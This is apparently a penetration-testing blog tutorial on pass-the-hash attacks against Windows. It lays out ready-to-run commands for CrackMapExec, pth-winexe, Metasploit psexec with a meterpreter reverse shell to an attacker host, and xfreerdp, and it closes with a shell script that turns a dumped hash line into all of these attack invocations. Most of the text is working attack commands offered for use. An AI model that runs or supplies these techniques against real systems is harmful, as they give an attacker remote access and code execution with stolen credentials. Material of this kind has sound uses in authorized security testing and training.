Pass The Hash for Command Line, MSF, and RDP

This is another one of those quick-hits that often comes in handy: you’ve captured a hash (maybe via mimikatz, through a Metasploit module such as post/windows/gather/hashdump, etc.) and you want to use that hash directly rather than cracking it. How do you do that?

Let’s assume that the hash you captured was (pwdump format, i.e. user:RID:LM hash:NT hash:::):

Administrator:500:abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98:::

To use this against a machine located at 10.20.30.40 from 10.30.50.70, in the domain “fakeDom” you could use each of the following techniques.

Command Line (CrackMapExec Version)

Note: If you need help installing CME just check out this post for instructions.

crackmapexec smb 10.20.30.40 -u Administrator -d fakeDom -H abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98 -x {COMMAND}

The -H option takes either the NT hash alone or LM:NT joined with a colon, not two space-separated values. CrackMapExec 4 and later require the protocol keyword (smb here) before the target; older versions take the target directly after crackmapexec.

Command Line (pth-winexe Version)

pth-winexe -U fakeDom/Administrator%abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98 //10.20.30.40 {COMMAND}

PSExec (via Metasploit)

This one uses the PSExec module from Metasploit, so fire up the console first:

msfconsole

Then use the PSExec module:

msf > use exploit/windows/smb/psexec

Set the options and exploit. The module needs SMBUser (and SMBDomain for a domain account) in addition to SMBPass, and SMBPass takes the hash as LM:NT:

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set RHOST 10.20.30.40
RHOST => 10.20.30.40
msf exploit(psexec) > set LHOST 10.30.50.70
LHOST => 10.30.50.70
msf exploit(psexec) > set LPORT 31337
LPORT => 31337
msf exploit(psexec) > set SMBDomain fakeDom
SMBDomain => fakeDom
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98
SMBPass => abc123abc123abc123abc123abc123ab:987zyx987zyx987zyx987zyx987zyx98
msf exploit(psexec) > exploit

Then wait for the reverse shell.  Of course, you can use plenty of other payloads, but I just used the standard reverse meterpreter for demonstration purposes.

RDP

This one uses the freerdp-x11 package, whose xfreerdp client has a /pth option. If it’s not already installed (which varies based on when you got your Kali distribution and whether or not you’ve done a dist-upgrade lately) then just install it like this:

apt-get install freerdp-x11

On current Kali releases the package is named freerdp2-x11 instead; the client binary is still xfreerdp.

And then to directly RDP into the system just use this command. Note that /pth takes the NT hash (the fourth field of the dump line), not the LM hash:

xfreerdp /u:Administrator /d:fakeDom /pth:987zyx987zyx987zyx987zyx987zyx98 /v:10.20.30.40

This only works when the target has Restricted Admin mode enabled (Windows 8.1 / Server 2012 R2 and later, with DisableRestrictedAdmin set to 0 under HKLM\System\CurrentControlSet\Control\Lsa). If it isn’t, the hash logon is refused and you’ll need one of the SMB-based techniques above instead.
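Since each of the tools above wants a different slice of the same dump line (CME and xfreerdp take the NT hash, pth-winexe and Metasploit take LM:NT), here is an added helper script, not part of the original post, that splits a pwdump line into its fields, sanity-checks that both hashes are 32 hex characters, and builds the four invocations. The sample line, target, domain and attacker address are constructed for the example; the LM value is the well-known placeholder Windows stores when no LM hash is kept, and the NT value is the NT hash of the string "password".

```shell
#!/bin/sh
# Added example (not from the original post): parse a pwdump/hashdump line
# and build the pass-the-hash invocations for CME, pth-winexe, xfreerdp and
# a Metasploit psexec resource file.
#
# pwdump format: user:RID:LM_HASH:NT_HASH:::
# Constructed sample: LM field is the "no LM hash stored" placeholder,
# NT field is the NT hash of "password".
SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'
TARGET='10.20.30.40'      # assumed victim
ATTACKER='10.30.50.70'    # assumed attacker box (LHOST)
DOMAIN='fakeDom'          # assumed domain
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'

hd_user() { printf '%s\n' "$1" | cut -d: -f1; }
hd_lm()   { printf '%s\n' "$1" | cut -d: -f3; }
hd_nt()   { printf '%s\n' "$1" | cut -d: -f4; }

# 0 if $1 is exactly 32 hex characters (one LM or NT hash).
is_hash() {
    [ "${#1}" -eq 32 ] || return 1
    case "$1" in *[!0-9a-fA-F]*) return 1 ;; esac
    return 0
}

# 0 if the LM field is the placeholder, i.e. only the NT hash is real.
lm_is_empty() { [ "$1" = "$EMPTY_LM" ]; }

# Refuse to build commands from a malformed or placeholder-filled line.
check_line() {
    is_hash "$(hd_lm "$1")" && is_hash "$(hd_nt "$1")"
}

# CrackMapExec 4+: protocol keyword first; -H takes NT alone or LM:NT.
cme_cmd() {
    printf 'crackmapexec smb %s -u %s -d %s -H %s -x %s\n' \
        "$TARGET" "$(hd_user "$1")" "$DOMAIN" "$(hd_nt "$1")" "$2"
}

# pth-winexe: LM:NT after the % separator.
winexe_cmd() {
    printf 'pth-winexe -U %s/%s%%%s:%s //%s %s\n' \
        "$DOMAIN" "$(hd_user "$1")" "$(hd_lm "$1")" "$(hd_nt "$1")" "$TARGET" "$2"
}

# xfreerdp /pth: NT hash only (needs Restricted Admin mode on the target).
rdp_cmd() {
    printf 'xfreerdp /u:%s /d:%s /pth:%s /v:%s\n' \
        "$(hd_user "$1")" "$DOMAIN" "$(hd_nt "$1")" "$TARGET"
}

# Metasploit resource file for exploit/windows/smb/psexec; run with
# msfconsole -r pth.rc. Older Metasploit releases name RHOSTS as RHOST.
msf_rc() {
    cat <<EOF
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set RHOSTS $TARGET
set LHOST $ATTACKER
set LPORT 31337
set SMBDomain $DOMAIN
set SMBUser $(hd_user "$1")
set SMBPass $(hd_lm "$1"):$(hd_nt "$1")
exploit -j
EOF
}

if check_line "$SAMPLE"; then
    cme_cmd "$SAMPLE" whoami
    winexe_cmd "$SAMPLE" whoami
    rdp_cmd "$SAMPLE"
    msf_rc "$SAMPLE"
    if lm_is_empty "$(hd_lm "$SAMPLE")"; then
        echo '# note: LM field is the empty-LM placeholder; only the NT hash is meaningful'
    fi
else
    echo "malformed dump line: $SAMPLE" >&2
fi
```

Quote the command passed to cme_cmd and winexe_cmd if it contains spaces, since -x and pth-winexe each take the remote command as a single argument. The hex check is also why the placeholder values in the post (987zyx…) would be rejected here: real LM and NT hashes are always 32 hex digits.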

Good hunting!
